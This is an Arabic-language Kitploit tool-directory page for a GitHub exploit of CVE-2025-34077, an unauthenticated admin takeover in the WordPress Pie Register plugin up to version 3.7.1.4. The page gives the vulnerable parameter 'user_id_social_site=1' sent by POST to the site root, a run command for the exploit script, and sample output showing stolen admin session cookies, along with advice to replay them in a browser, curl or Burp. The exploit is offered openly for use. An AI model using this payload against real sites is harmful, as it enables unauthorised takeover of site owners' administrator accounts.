Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-34077 — WordPress Pie Register ≤ 3.7.1.4 - تصعيد صلاحيات المدير (بدون مصادقة) | Kitploit
أدوات/GitHubGitHub/mrjhaxcore/cve-2025-34077
المصادقة والترخيصتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubmrjhaxcore/cve-2025-34077

CVE-2025-34077

WordPress Pie Register ≤ 3.7.1.4 - تصعيد صلاحيات المدير (بدون مصادقة)

عرض المستودع
63منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-34077 — WordPress Pie Register ≤ 3.7.1.4 - تصعيد صلاحيات المسؤول (بدون مصادقة)

Exploit Status CVE Badge Python

💀 المؤلف

Mrj Haxcore

🧠 ملخص الثغرة

توفّر إضافة Pie Register الخاصة بـ WordPress (الإصدار ≤ 3.7.1.4) نقطة نهاية غير مصادق عليها تسمح للمهاجم بـ اختطاف جلسات المسؤول بمجرد إرسال حمولة محددة عبر POST.

يؤدي استغلال هذه الثغرة إلى سرقة ملفات تعريف ارتباط الجلسة الخاصة بالمستخدم ذي المعرّف 1 (عادةً admin) دون الحاجة إلى أي بيانات اعتماد لتسجيل الدخول.


📦 البرمجيات المتأثرة

  • اسم الإضافة: Pie Register
  • الإصدار: <= 3.7.1.4
  • معرّف الإضافة (Slug): pie-register
  • صفحة الإضافة
  • رابط تحميل النسخة المعرّضة للثغرة

📬 المعامل المعرّض للثغرة:

user_id_social_site=1

عند إرسال هذا المعامل إلى المسار الجذر (/)، يؤدي إلى قيام الإضافة بمصادقة المهاجم بصفته المستخدم ذا المعرّف 1 (عادةً admin)، وإصدار ملفات تعريف ارتباط جلسة صالحة.


🔧 المتطلبات

  • Python 3.x
  • requests, beautifulsoup4 (اختياري، لتحليل ملفات تعريف الارتباط)

▶️ تشغيل الاستغلال

root@kitploit:~
python3 pie.py http://target.site

---
Output
[*] Sending payload to hijack admin session...

[+] Successfully hijacked cookies for user_id=1 (admin):
    wordpress_sec_xxxxxx = <cookie_value>
    wordpress_logged_in_xxxxxx = <cookie_value>

[!] Use these cookies in your browser or tools like curl or Burp to act as admin.
تنزيل الأداة